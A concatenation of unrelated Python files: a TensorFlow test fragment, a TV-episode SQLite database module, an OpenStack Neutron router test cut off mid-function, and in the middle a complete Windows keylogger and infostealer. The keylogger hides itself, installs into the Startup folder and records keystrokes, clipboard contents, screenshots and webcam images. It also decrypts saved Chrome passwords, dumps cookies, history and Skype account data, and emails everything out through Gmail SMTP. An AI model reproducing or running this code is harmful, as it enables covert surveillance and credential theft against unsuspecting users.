compression_type=tf.python_io.TFRecordCompressionType.GZIP)
serialized_examples = list(tf.python_io.tf_record_iterator(record_filepath, options=options))
self.assertEqual(len(serialized_examples), 1)
example = tf.train.Example()
example.ParseFromString(serialized_examples[0])
transformed_number = example.features.feature['num_col'].float_list.value[0]
self.assertAlmostEqual(transformed_number, 23.0)
transformed_category = example.features.feature['cat_col'].int64_list.value[0]
self.assertEqual(transformed_category, 2)
image_bytes = example.features.feature['img_col'].float_list.value
self.assertEqual(len(image_bytes), 2048)
self.assertTrue(any(x != 0.0 for x in image_bytes))
finally:
dataset.delete(delete_contents=True)
for obj in bucket.objects():
obj.delete()
bucket.delete()
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A portal to the tv database.
"""
import sqlite3, logging, os
from datetime import date
import re
from collections import OrderedDict
from . import tvregexes, util
from .util import normpath, split_root_dir, ensure_utf8, ancestry, posixpath
from . import appconfig as cfg
from .texceptions import InitExistingDatabaseError, IncompleteEpisodeError, InvalidArgumentError
from . import __pkgname__
log = logging.getLogger(__pkgname__)
class Episode(OrderedDict):
"""
Keys mapping to database fields:
--------------------------
'id' : the episode's id (from thetvdb) (int)
'created_at' : the time which episode is added to database (datetime)
'modified_at' : last modified time of episode in database (datetime)
'title' : title of episode (str)
'ep_number' : number of episode in season (int)
'extra_ep_number' : number of extra episode in file (if any) (int)
'ep_summary' : plot summary of episode (str)
'air_date' : date when episode first aired (date)
'file_path' : path to media file containing episode (relative to source dir) (str)
'season_id' : id of episode's season (from thetvdb) (int)
'season_number' : number of season (int)
'series_id' : id of episode's series (from thetvdb) (int)
'series_title' : title of series (str)
'series_summary' : plot summary of series (str)
'series_start_date' : when series first aired (date)
'run_time_minutes' : (int)
'network' : (str)
keys extracted by the filename parser (not in database):
---------------------------
'release_group' : scene release group
'which_regex' : which regex matched the episode
'extra_info' : any seemingly irrelevant text from filename
This is a dict derived type which does not allow creation of new keys
except those listed.
__setitem__ will convert given values to their correct types
when possible.
attributes
-----------------
dvdrip = bool - this will suggest using dvd episode ordering when
looking up info from tvdb.
"""
preset_keys = (
'id',
'created_at',
'modified_at',
'title',
'ep_number',
'extra_ep_number',
'ep_summary',
'air_date',
'file_path',
'season_id',
'season_number',
'series_id',
'series_title',
'series_summary',
'series_start_date',
'run_time_minutes',
'network',
#parser keys
'release_group',
'which_regex',
'extra_info',
)
numeric_keys = (
'id',
'ep_number',
'extra_ep_number',
'season_id',
'season_number',
'series_id',
'run_time_minutes'
)
#keys which matter only in local context
local_keys = (
'file_path',
'release_group',
'extra_ep_number',
'which_regex',
'extra_info'
)
db_keys = (
'id',
'title',
'ep_number',
'extra_ep_number',
'ep_summary',
'air_date',
'file_path',
'season_id',
'season_number',
'series_id',
'series_title',
'series_summary',
'series_start_date',
'run_time_minutes',
'network'
)
def __init__(self, path, root_dir):
#path = util.ensure_utf8(path)
super(Episode, self).__init__()
for key in self.preset_keys:
super(Episode, self).__setitem__(
key, None
)
self['file_path'] = path
self.root_dir = normpath(root_dir)
self.dvdrip = False
def safe_update(self, otherep):
"""
safe_update(dict) -> None\n
otherep can be an Episode object or any dict like
object with the same keys.\n
Unlike dict.update(), this will only update
'None' values in the destination dict.
"""
for key in otherep.keys():
if self[key] is not None: continue
self[key] = otherep[key]
def is_fully_parsed(self):
"""
Ep is fully parsed, true or false.\n
Will throw key exceptions if self is not a good ep dict.
"""
return self['series_title'] and self['season_number'] is not None and self['ep_number'] is not None
def clean_name(self, name):
#TODO: find junk
"""
Strips all kinds of junk from a name.
"""
junk = tvregexes.junk
if name is None: return None
name = re.sub(junk, ' ', name)
name = name.strip()
name = name.title()
return name
def path(self, form='abs'):
"""
Return this episode's file path.
`form` may be 'abs' or 'rel' (absolute or relative)
Can also be 'db' which is same as 'rel' but backslashes
are always replaced by forward slashes.
path will be returned in respective form.
Relative means relative to `root_dir`.
"""
if form == 'abs':
root, path = split_root_dir(self['file_path'], self.root_dir)
return normpath(os.path.join(root, path))
elif form == 'rel':
return split_root_dir(self['file_path'], self.root_dir)[1]
elif form == 'db':
p = split_root_dir(self['file_path'], self.root_dir)[1]
return posixpath(p)
else:
raise InvalidArgumentError(
'arg `form` must be "abs" or "rel", you gave %s' % form
)
def pretty(self):
"""
Get pretty print output of this episode.
"""
return '\n'.join(['%s : %s' % (k, v) for k, v in self.iteritems()])
def __setitem__(self, key, value):
"""
Introducing some type safety and stuff to this dict.\n
Will implicitly convert any value put in
a key in numerics to int.\n
"""
if key not in self.preset_keys:
raise KeyError(
'''\'%s\' is not a valid key for a Episode.
\nValid keys are: %s''' % (key, self.preset_keys))
def set_val(val):
#really set the value to key
super(Episode, self).__setitem__(key, val)
if key in self.numeric_keys and value is not None:
#will raise an error if value is not a valid number
return set_val(int(value))
#strings
if isinstance(value, basestring):
if value == '' or value is None:
return set_val(None)
return set_val(util.ensure_utf8(value))
return set_val(value)
class Database(object):
"""
Handles database connections and direct query executions.
"""
def __init__(self, dbfile):
self.dbfile = dbfile
def db_file_exists(self):
"""
Checks if self.dbfile exists.
Convenience function.
"""
return os.path.exists(self.dbfile)
def _get_connection(self):
conn = sqlite3.connect(self.dbfile, detect_types=True)
conn.row_factory = sqlite3.Row
return conn
def execute_query(self, query, params=(), fetch=-1, isscript=False):
"""
Executes the given query with given params.
optional argument 'fetch' decides how many rows to
return from resultset.\n
fetch==0 -> None
fetch==1 -> [row]
fetch<0 -> [all rows,...]
fetch>1 -> fetchmany(fetch)
Default is -1 (all rows) (cursor.fetchall)
rows are returned as a list of |sqlite3.Row| objects.
If isscript==True it will use cursor.executescript to exec.
Can raise all kinds of databaseerrors.
"""
#TODO: wrap errors into some friendly packages.
conn = self._get_connection()
cur = conn.cursor()
try:
if isscript:
cur.executescript(query)
else:
cur.execute(query, params)
if fetch < 0:
result = cur.fetchall()
elif fetch == 1:
result = cur.fetchone()
elif fetch == 0:
result = None
elif fetch > 1:
result = cur.fetchmany(fetch)
conn.commit()
finally:
conn.close()
return result
class TVDatabase(Database):
def __init__(self, directory):
self.directory = normpath(util.ensure_utf8(directory))
dbfile = os.path.join(
directory,
cfg.get('database', 'local-database-filename')
)
super(TVDatabase, self).__init__(dbfile)
def create_database(self, force=False, soft=False):
"""
Import the database schema to a new database.
This will raise a InitExistingDatabaseError if db already exists.
If force==True: delete existing dbfile before creating.
If force==True: ignore InitExistingDatabaseError
"""
if self.db_file_exists():
if force:
os.unlink(self.dbfile)
elif soft:
return
else:
raise InitExistingDatabaseError(self.dbfile)
schema = open(
os.path.join(
os.path.dirname(__file__), 'schema.sql')).read()
self.execute_query(schema, isscript=True)
def _exists(self, id_):
"""
_exists(id_) -> True or False
Check if row with given id_ exists in episode table.
"""
log.debug(
'Will check if id:%s (type:%s) exists in db',
id_, type(id_)
)
q = 'SELECT * FROM episode WHERE id = ?;'
res = self.execute_query(q, (id_,), fetch=1)
if res: return True
else: return False
def episode_exists(self, ep):
"""
episode_exists(Episode) -> bool
Check if an episode with same id as given already
exists in database.
"""
if not ep['id']:
#TODO: HACK
return False
return self._exists(ep['id'])
def path_exists(self, path):
"""
path_exists(path) -> bool
Check whether an episode with given path exists in db.
Returns True or False respectively.
"""
"""
path = os.path.relpath(
os.path.abspath(path),
self.directory
)
"""
q = 'SELECT id FROM episode WHERE file_path = ?;'
log.debug(path)
params = (posixpath(ensure_utf8(path)),)
res = self.execute_query(q, params, fetch=1)
if res: return True
else: return False
def get_episodes(self, where_statement='', params=()):
"""
get_episode(where_statement='', params=()) -> yield Episode
yield all episodes matching given where_statement.
where_statement should be a valid sqlite3 in form 'WHERE [expression]'
parametarized queries are preferred for safety, but not enforced here.
If no where_statement is given, all episodes are selected.
"""
q = 'SELECT * FROM episode ' + where_statement
for row in self.execute_query(q, params):
e = Episode('', self.directory)
e.update(row)
yield e
def delete_episode(self, epid):
"""
Delete episode with given `epid` from database.
"""
q = 'DELETE FROM episode WHERE id = ?;'
p = (epid,)
self.execute_query(q, p, fetch=0)
def _insert_episode(self, epobj):
q = 'INSERT INTO episode (%s) VALUES (%s);'
insfields = ','.join(epobj.db_keys)
insvals = ','.join('?' for x in epobj.db_keys)
q = q % (insfields, insvals)
params = [epobj[k] for k in epobj.db_keys]
self.execute_query(q, params, fetch=0)
return epobj['id']
def _update_episode(self, epobj):
q = 'UPDATE episode SET %s WHERE id = ?;'
updfields = ','.join(['%s=?' % (key) for key in epobj.db_keys])
q = q % updfields
params = [epobj[k] for k in epobj.db_keys]+[epobj['id']] #add 'id' for the where stmnt
log.debug('%s\n%s', q, params)
self.execute_query(q, params, fetch=0)
return epobj['id']
def upsert_episode(self, epobj):
"""
upsert_episode(LocalEpisode) -> int episode id
database upsert function.
Implicitly converts episode's file_path
to its relative path from self.directory
"""
if not epobj['id']:
raise IncompleteEpisodeError(
'Unable to add id-less episode to the database: %s' % epobj
)
epobj['file_path'] = ensure_utf8(epobj.path('db'))
if self._exists(epobj['id']):
return self._update_episode(epobj)
else:
return self._insert_episode(epobj)
def add_unparsed_child(self, child_path):
"""
Will automatically determine the parent path based on child path.
"""
log.debug('adding unparsed child: %s', child_path)
root, path = split_root_dir(child_path, self.directory)
q = '''
INSERT INTO unparsed_episode(
child_path, parent_path) VALUES (?, ?);
'''
def do_query(ps):
try:
self.execute_query(
q,
(ensure_utf8(ps[0]), ensure_utf8(ps[1])),
fetch=0
)
except sqlite3.IntegrityError as e:
#probable means child_path is not unique
log.debug(
'Error while adding unparsed child '\
+'(usually nothing to worry about): %s\nmessage: %s',
ps, e.message
)
pass
ancest = ancestry(path)
if not ancest: #no parents
params = (path, None)
do_query(params)
elif len(ancest) == 1: #only parent, no gramps
params = (path, ancest[0])
do_query(params)
else: #grandparents and shit
do_query((path, ancest[-1])) #put filename itself
for index, p in enumerate(ancest):
if index == 0:
params = (p, None)
else:
params = (p, ancest[index-1]) #parent is p from before
do_query(params)
def make_where_statement(dicta=None, operator='=', separator='AND', **kwargs):
"""
make_where_statement(operator='=', separator='AND', **kwargs) -> ('', (,))
Makes a simple where statement, compatible with get_rows and get_row.\n
Default operator used between col and value is '=' (equals)\n
Available operators include everything supported by the dbms\n
e.g. '>', '<', '!=', 'LIKE' (text fields), 'ILIKE', etcetera\n\n
separator can be 'AND', 'OR' or anything else the dbms supports.
Takes any other named arg and intperpres as a column name:value pair.
"""
dicta=dicta if dicta else kwargs
if not dicta:
return ('', ())
sufstring = ''
sufparams = []
for key, value in dicta.iteritems():
pref = 'WHERE' if not sufstring else separator
sufstring += '%s %s %s ? ' % (pref, key, operator)
sufparams.append(value)
return (sufstring, sufparams)
|
|
import os
import time
import psutil
import shutil
import pyHook
import smtplib
import sqlite3
import win32con
import win32api
import win32gui
import mimetypes
import pythoncom
import win32crypt
import win32console
from ctypes import *
import win32clipboard
from os import getenv
from Queue import Queue
from PIL import ImageGrab
from threading import Thread
from SimpleCV import Camera
from email.utils import formatdate
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from datetime import datetime, timedelta
from email.mime.multipart import MIMEMultipart
NUMBER_OF_THREADS = 7
JOB_NUMBER = [1, 2, 3, 4, 5, 6, 7]
queue = Queue()
PROCNAME = "chrome.exe"
# KEYLOGGER CONFIG
# Output Config
path_to_files = "C:/Users/" + win32api.GetUserName() + "/Documents/Windows Defender/"
file_name = path_to_files + "log.txt"
path_to_images = path_to_files + "IMAGES/"
# CAMERA CONFIG
# Screenshot
# interval in sec
interval_screenshot = 120
# WebCam
# interval in sec
interval_webcam = 120
# MAIL CONFIG
files = [path_to_files + "log.txt", ]
FromConf = 'username@gmail.com'
ToConf = 'username@gmail.com'
passwordConf = 'password'
intervalMail = 600
# Window Config
curr_window = None
class Startup:
def hide(self):
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
def add_to_startup(self):
path = "C:\\Users\\" + win32api.GetUserName() + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
if os.path.isfile(path + __file__) == True:
pass
else:
shutil.copy(os.getcwd() + __file__, path)
def create_hidden_folder(self):
if os.path.exists(path_to_files):
pass
else:
os.makedirs(path_to_files)
win32api.SetFileAttributes(path_to_files, win32con.FILE_ATTRIBUTE_HIDDEN)
def kill_chrome(self):
for proc in psutil.process_iter():
try:
if proc.name() == PROCNAME:
proc.kill()
except:
pass
def make_dirs(self):
if not os.path.exists(path_to_files + "SKYPE"):
os.mkdir(path_to_files + "SKYPE")
if not os.path.exists(path_to_files + "IMAGES"):
os.mkdir(path_to_files + "IMAGES")
if not os.path.exists(path_to_files + "CHROME"):
os.mkdir(path_to_files + "CHROME")
if not os.path.exists(path_to_files + "FIREFOX"):
os.mkdir(path_to_files + "FIREFOX")
def run(self):
self.hide()
self.add_to_startup()
self.create_hidden_folder()
self.make_dirs()
self.kill_chrome()
class Keylogger:
def get_curr_window(self):
user32 = windll.user32
kernel32 = windll.kernel32
hwnd = user32.GetForegroundWindow()
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
process_id = "%d" % pid.value
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
windll.psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
pid_info = "\n[ PID %s - %s - %s ]" % (process_id, executable.value, window_title.value)
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
return pid_info
def keydown(self, event):
global data
global curr_window
if event.WindowName != curr_window:
curr_window = event.WindowName
fp = open(file_name, 'a')
data = self.get_curr_window()
fp.write(data + "\n")
fp.close()
if event.Ascii > 32 and event.Ascii < 127:
fp = open(file_name, 'a')
data = chr(event.Ascii)
fp.write(data)
fp.close()
else:
while event.Key == "Lcontrol" or "Rcontrol" and event.Key == "A":
fp = open(file_name, 'a')
fp.write("[SELECT-ALL]")
fp.close()
break
while event.Key == "Lcontrol" or "Rcontrol" and event.Key == "C":
fp = open(file_name, 'a')
fp.write("[COPY]")
fp.close()
break
while event.Key == "Lcontrol" or "Rcontrol" and event.Key == "V":
win32clipboard.OpenClipboard()
try:
data = "\n[PASTE] - %s\n" % win32clipboard.GetClipboardData()
except TypeError:
pass
win32clipboard.CloseClipboard()
fp = open(file_name, 'a')
fp.write(data)
fp.close()
break
if event.Key == "Lshift" or "Rshift" or "Return" or "Back":
fp = open(file_name, 'a')
data = "[%s]" % event.Key
fp.write(data)
fp.close()
else:
fp = open(file_name, 'a')
data = "\n[%s]\n" % event.Key
fp.write(data)
fp.close()
def keylogger(self):
obj = pyHook.HookManager()
obj.KeyDown = self.keydown
obj.HookKeyboard()
obj.HookMouse()
pythoncom.PumpMessages()
def webcam_pic(self, interval_w):
try:
cam = Camera()
while True:
time.sleep(interval_w)
cur_time = str(str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min) + "_" + str(time.localtime().tm_sec))
scr = path_to_images + "webcam_" + cur_time + ".jpg"
files.append(str(scr))
img = cam.getImage()
img.save(scr)
except Exception as e:
print e
def screenshot(self, interval_scr):
while True:
try:
time.sleep(interval_scr)
cur_time = str(str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min) + "_" + str(time.localtime().tm_sec))
scr = path_to_images + "screenshot_" + cur_time + ".png"
files.append(str(scr))
ImageGrab.grab().save(scr, "PNG")
except Exception as e:
print e
def run(self):
self.keylogger()
class Chrome:
"""
Dump All Chrome Passwords
Output:
Website: some-website.com
Username: some username for this website
Password: password for this Username
"""
def dump_passwords(self):
con = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cur = con.cursor()
cur.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cur.fetchall():
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
site = 'Site: %s\n' % result[0]
username = 'Username: %s\n' % result[1]
password = 'Password: %s\n\n' % password
with open(r'' + str(path_to_files) + 'CHROME/chrome_passwords.txt', 'a') as outputfile:
outputfile.write(site + username + password)
outputfile.close()
files.append(path_to_files + 'CHROME/chrome_passwords.txt')
def dump_history(self):
con = sqlite3.connect(os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\history")
cur = con.cursor()
output_file = open(r'' + str(path_to_files) + 'CHROME/chrome_history.txt', 'a')
cur.execute('SELECT url, title, last_visit_time FROM urls')
for row in cur.fetchall():
output_file.write("Website: %s \n\t Title: %s \n\t Last Visited: %s \n\n" % (
u''.join(row[0]).encode('utf-8').strip(), u''.join(row[1]).encode('utf-8').strip(),
u''.join(str(row[2])).encode('utf-8').strip()))
output_file.close()
files.append(path_to_files + 'CHROME/chrome_history.txt')
def dump_cookies(self):
con = sqlite3.connect(os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Cookies")
cur = con.cursor()
output_file = open(r''+ str(path_to_files) + 'CHROME/chrome_cookies.txt', 'a')
cur.execute('SELECT host_key, name, value FROM Cookies')
for row in cur.fetchall():
output_file.write("Hostname: %s \n\t Name: %s \n\t Value: %s \n\n" % (u''.join(row[0]).encode('utf-8').strip(), u''.join(row[1]).encode('utf-8').strip(),u''.join(row[2]).strip()))
output_file.close()
files.append(path_to_files + 'CHROME/chrome_cookies.txt')
class InternetExplorer:
def dump_cookies(self):
pass
def dump_history(self):
pass
class Firefox:
db_files = ['', '', '']
def dump_cookies(self):
pass
def dump_history(self):
pass
def dump_downloads(self):
pass
class BrowserHandler:
def chrome(self):
Chrome().dump_cookies()
Chrome().dump_history()
Chrome().dump_passwords()
def internet_explorer(self):
pass
def firefox(self):
Firefox().dump_history()
Firefox().dump_cookies()
Firefox().dump_downloads()
def run(self):
if os.path.isdir(os.getenv("APPDATA") + "\..\Local\Google\Chrome"):
self.chrome()
if os.path.isdir(os.getenv("APPDATA") + "\..\Roaming\Mozilla\Firefox"):
self.firefox()
else:
pass
class Skype:
def get_skype_dir(self):
base_dir = os.getenv("APPDATA") + "\..\Roaming\Skype"
subdirectories = os.listdir(base_dir)
for dir in subdirectories:
if not (dir == 'Content' or dir == 'DataRv' or dir == 'My Skype Received Files' or dir == 'RootTools' or dir == 'shared.lck' or dir == 'shared.xml' or dir == 'shared_dynco' or dir == 'shared_httpfe'):
return dir
def dump_skype_info(self, uname):
con = sqlite3.connect(os.getenv("APPDATA") + "\..\Roaming\Skype\%s\main.db" % uname)
cur = con.cursor()
output_file = open(r''+ str(path_to_files) + 'SKYPE/skype_data.txt', 'a')
cur.execute('SELECT signin_name, skypename, fullname, birthday, gender, languages, country, province, phone_home, phone_office, phone_mobile, emails, homepage FROM Accounts')
for result in cur.fetchall():
birthday = datetime.fromtimestamp(result[3]).strftime('%Y-%m-%d')
if result[4] == 1:
gender = "Male"
else:
gender = "Female"
general_info = "General Information:\n\tFull Name: %s\n\tBirthday: %s\n\tGender: %s\n\tLanguage: %s\n\tCountry: %s\n\tProvince: %s\n\n" % (result[2], birthday, gender, result[5], result[6], result[7])
contact_info = "Contact Information:\n\tPhone Home: %s\n\tPhone Office: %s\n\tPhone Mobile: %s\n\tE-Mail: %s\n" % (result[8], result[9], result[10], result[11])
output_file.write(general_info + contact_info)
output_file.close()
files.append(path_to_files + "SKYPE/skype_data.txt")
con.close()
def get_skype_info(self):
if os.path.isdir(os.getenv("APPDATA") + "\..\Roaming\Skype"):
skype_uname = self.get_skype_dir()
self.dump_skype_info(skype_uname)
else:
pass
def run(self):
self.get_skype_info()
class MailHandler:
def send_mail(self, From, to, password, interval_mail):
while True:
time.sleep(interval_mail)
msg = MIMEMultipart()
msg['From'] = From
msg['To'] = to
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = 'Lo0sR-Keylogger'
msg.attach(MIMEText('Output'))
try:
smtp = smtplib.SMTP('smtp.gmail.com:587')
smtp.starttls()
smtp.login(From, password)
except:
login = 'failed'
else:
login = 'success'
if login == 'success':
for f in files:
f = f
ctype, encoding = mimetypes.guess_type(f)
if ctype is None or encoding is not None:
# No guess could be made, or the file is encoded (compressed), so
# use a generic bag-of-bits type.
ctype = 'application/octet-stream'
maintype, subtype = ctype.split('/', 1)
if maintype == 'text':
fp = open(f)
# Note: we should handle calculating the charset
part = MIMEText(fp.read(), _subtype=subtype)
fp.close()
elif maintype == 'image':
fp = open(f, 'rb')
part = MIMEImage(fp.read(), _subtype=subtype)
fp.close()
else:
fp = open(f, 'rb')
part = MIMEBase(maintype, subtype)
part.set_payload(fp.read())
fp.close()
part.add_header('Content-Disposition', 'attachment; filename="%s"' % f)
msg.attach(part)
try:
smtp.sendmail(From, to, msg.as_string())
open(file_name, 'w').close()
with open(file_name, 'w') as fl:
fl.write('### Keylogger - Log ###\n')
fl.close()
for fi in files[1:]:
os.remove(fi)
del files[:]
files.append("output.txt")
smtp.close()
except Exception:
pass
smtp.close()
else:
smtp.close()
class ThreadHandler:
def create_workers(self):
for _ in range(NUMBER_OF_THREADS):
t = Thread(target=self.work)
t.daemon = True
t.start()
def work(self):
x = queue.get()
if x == 1:
Startup().run()
if x == 2:
Keylogger().run()
if x == 3:
MailHandler().send_mail(FromConf, ToConf, passwordConf, intervalMail)
if x == 4:
time.sleep(2)
BrowserHandler().run()
if x == 5:
time.sleep(2)
Skype().run()
if x == 6:
Keylogger().screenshot(interval_screenshot)
if x == 7:
Keylogger().webcam_pic(interval_webcam)
queue.task_done()
def create_jobs(self):
for x in JOB_NUMBER:
queue.put(x)
queue.join()
def run(self):
self.create_workers()
self.create_jobs()
if __name__ == '__main__':
ThreadHandler().run()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.agent.common import config as agent_config
from neutron.agent.l3 import router_info
from neutron.agent.linux import ip_lib
from neutron.common import constants as l3_constants
from neutron.common import exceptions as n_exc
from neutron.openstack.common import uuidutils
from neutron.tests import base
_uuid = uuidutils.generate_uuid
class TestRouterInfo(base.BaseTestCase):
def setUp(self):
super(TestRouterInfo, self).setUp()
conf = agent_config.setup_conf()
conf.use_namespaces = True
self.ip_cls_p = mock.patch('neutron.agent.linux.ip_lib.IPWrapper')
ip_cls = self.ip_cls_p.start()
self.mock_ip = mock.MagicMock()
ip_cls.return_value = self.mock_ip
self.ri_kwargs = {'agent_conf': conf,
'interface_driver': mock.sentinel.interface_driver}
def _check_agent_method_called(self, calls):
self.mock_ip.netns.execute.assert_has_calls(
[mock.call(call, check_exit_code=False) for call in calls],
any_order=True)
def test_routing_table_update(self):
ri = router_info.RouterInfo(_uuid(), {}, **self.ri_kwargs)
ri.router = {}
fake_route1 = {'destination': '135.207.0.0/16',
'nexthop': '1.2.3.4'}
fake_route2 = {'destination': '135.207.111.111/32',
'nexthop': '1.2.3.4'}
ri._update_routing_table('replace', fake_route1)
expected = [['ip', 'route', 'replace', 'to', '135.207.0.0/16',
'via', '1.2.3.4']]
self._check_agent_method_called(expected)
ri._update_routing_table('delete', fake_route1)
expected = [['ip', 'route', 'delete', 'to', '135.207.0.0/16',
'via', '1.2.3.4']]
self._check_agent_method_called(expected)
ri._update_routing_table('replace', fake_route2)
expected = [['ip', 'route', 'replace', 'to', '135.207.111.111/32',
'via', '1.2.3.4']]
self._check_agent_method_called(expected)
ri._update_routing_table('delete', fake_route2)
expected = [['ip', 'route', 'delete', 'to', '135.207.111.111/32',
'via', '1.2.3.4']]
self._check_agent_method_called(expected)
def test_routes_updated(self):
ri = router_info.RouterInfo(_uuid(), {}, **self.ri_kwargs)
ri.router = {}
fake_old_routes = []
fake_new_routes = [{'destination': "110.100.31.0/24",
'nexthop': "10.100.10.30"},
{'destination': "110.100.30.0/24",
'nexthop': "10.100.10.30"}]
ri.routes = fake_old_routes
ri.router['routes'] = fake_new_routes
ri.routes_updated()
expected = [['ip', 'route', 'replace', 'to', '110.100.30.0/24',
'via', '10.100.10.30'],
['ip', 'route', 'replace', 'to', '110.100.31.0/24',
'via', '10.100.10.30']]
self._check_agent_method_called(expected)
fake_new_routes = [{'destination': "110.100.30.0/24",
'nexthop': "10.100.10.30"}]
ri.router['routes'] = fake_new_routes
ri.routes_updated()
expected = [['ip', 'route', 'delete', 'to', '110.100.31.0/24',
'via', '10.100.10.30']]
self._check_agent_method_called(expected)
fake_new_routes = []
ri.router['routes'] = fake_new_routes
ri.routes_updated()
expected = [['ip', 'route', 'delete', 'to', '110.100.30.0/24',
'via', '10.100.10.30']]
self._check_agent_method_called(expected)
class BasicRouterTestCaseFramework(base.BaseTestCase):
def _create_router(self, router=None, **kwargs):
if not router:
router = mock.MagicMock()
self.agent_conf = mock.Mock()
# NOTE The use_namespaces config will soon be deprecated
self.agent_conf.use_namespaces = True
self.router_id = _uuid()
return router_info.RouterInfo(self.router_id,
router,
self.agent_conf,
mock.sentinel.interface_driver,
**kwargs)
class TestBasicRouterOperations(BasicRouterTestCaseFramework):
def test_get_floating_ips(self):
router = mock.MagicMock()
router.get.return_value = [mock.sentinel.floating_ip]
ri = self._create_router(router)
fips = ri.get_floating_ips()
self.assertEqual([mock.sentinel.floating_ip], fips)
def test_process_floating_ip_nat_rules(self):
ri = self._create_router()
fips = [{'fixed_ip_address': mock.sentinel.ip,
'floating_ip_address': mock.sentinel.fip}]
ri.get_floating_ips = mock.Mock(return_value=fips)
ri.iptables_manager = mock.MagicMock()
ipv4_nat = ri.iptables_manager.ipv4['nat']
ri.floating_forward_rules = mock.Mock(
return_value=[(mock.sentinel.chain, mock.sentinel.rule)])
ri.process_floating_ip_nat_rules()
# Be sure that the rules are cleared first and apply is called last
self.assertEqual(mock.call.clear_rules_by_tag('floating_ip'),
ipv4_nat.mock_calls[0])
self.assertEqual(mock.call.apply(), ri.iptables_manager.mock_calls[-1])
# Be sure that add_rule is called somewhere in the middle
ipv4_nat.add_rule.assert_called_once_with(mock.sentinel.chain,
mock.sentinel.rule,
tag='floating_ip')
def test_process_floating_ip_nat_rules_removed(self):
ri = self._create_router()
ri.get_floating_ips = mock.Mock(return_value=[])
ri.iptables_manager = mock.MagicMock()
ipv4_nat = ri.iptables_manager.ipv4['nat']
ri.process_floating_ip_nat_rules()
# Be sure that the rules are cleared first and apply is called last
self.assertEqual(mock.call.clear_rules_by_tag('floating_ip'),
ipv4_nat.mock_calls[0])
self.assertEqual(mock.call.apply(), ri.iptables_manager.mock_calls[-1])
# Be sure that add_rule is called somewhere in the middle
self.assertFalse(ipv4_nat.add_rule.called)
def _test_add_fip_addr_to_device_error(self, device):
ri = self._create_router()
ip = '15.1.2.3'
result = ri._add_fip_addr_to_device(
{'id': mock.sentinel.id, 'floating_ip_address': ip}, device)
device.addr.add.assert_called_with(ip + '/32')
return result
def test__add_fip_addr_to_device(self):
result = self._test_add_fip_addr_to_device_error(mock.Mock())
self.assertTrue(result)
def test__add_fip_addr_to_device_error(self):
device = mock.Mock()
device.addr.add.side_effect = RuntimeError
result = self._test_add_fip_addr_to_device_error(device)
self.assertFalse(result)
def test_process_snat_dnat_for_fip(self):
ri = self._create_router()
ri.process_floating_ip_nat_rules = mock.Mock(side_effect=Exception)
self.assertRaises(n_exc.FloatingIpSetupException,
ri.process_snat_dnat_for_fip)
ri.process_floating_ip_nat_rules.assert_called_once_with()
def test_put_fips_in_error_state(self):
ri = self._create_router()
ri.router = mock.Mock()
ri.router.get.return_value = [{'id': mock.sentinel.id1},
{'id': mock.sentinel.id2}]
statuses = ri.put_fips_in_error_state()
expected = [{mock.sentinel.id1: l3_constants.FLOATINGIP_STATUS_ERROR,
mock.sentinel.id2: l3_constants.FLOATINGIP_STATUS_ERROR}]
self.assertNotEqual(expected, statuses)
def test_configure_fip_addresses(self):
ri = self._create_router()
ri.process_floating_ip_addresses = mock.Mock(
side_effect=Exception)
self.assertRaises(n_exc.FloatingIpSetupException,
ri.configure_fip_addresses,
mock.sentinel.interface_name)
ri.process_floating_ip_addresses.assert_called_once_with(
mock.sentinel.interface_name)
def test_get_router_cidrs_returns_cidrs(self):
ri = self._create_router()
addresses = ['15.1.2.2/24', '15.1.2.3/32']
device = mock.MagicMock()
device.addr.list.return_value = [{'cidr': addresses[0]},
{'cidr': addresses[1]}]
self.assertEqual(set(addresses), ri.get_router_cidrs(device))
@mock.patch.object(ip_lib, 'IPDevice')
class TestFloatingIpWithMockDevice(BasicRouterTestCaseFramework):
def test_process_floating_ip_addresses_remap(self, IPDevice):
fip_id = _uuid()
fip = {
'id': fip_id, 'port_id': _uuid(),
'floating_ip_address': '15.1.2.3',
'fixed_ip_address': '192.168.0.2'
}
IPDevice.return_value = device = mock.Mock()
device.addr.list.return_value = [{'cidr': '15.1.2.3/32'}]
ri = self._create_router()
ri.get_floating_ips = mock.Mock(return_value=[fip])
fip_statuses = ri.process_floating_ip_addresses(
mock.sentinel.interface_name)
self.assertEqual({fip_id: l3_constants.FLOATINGIP_STATUS_ACTIVE},
fip_statuses)
self.assertFalse(device.addr.add.called)
self.assertFalse(device.addr.delete.called)
def test_process_router_with_disabled_floating_ip(self, IPDevice):
fip_id = _uuid()
fip = {
'id': fip_id, 'port_id': _uuid(),
'floating_ip_address': '15.1.2.3',
'fixed_ip_address': '192.168.0.2'
}
ri = self._create_router()
ri.floating_ips = [fip]
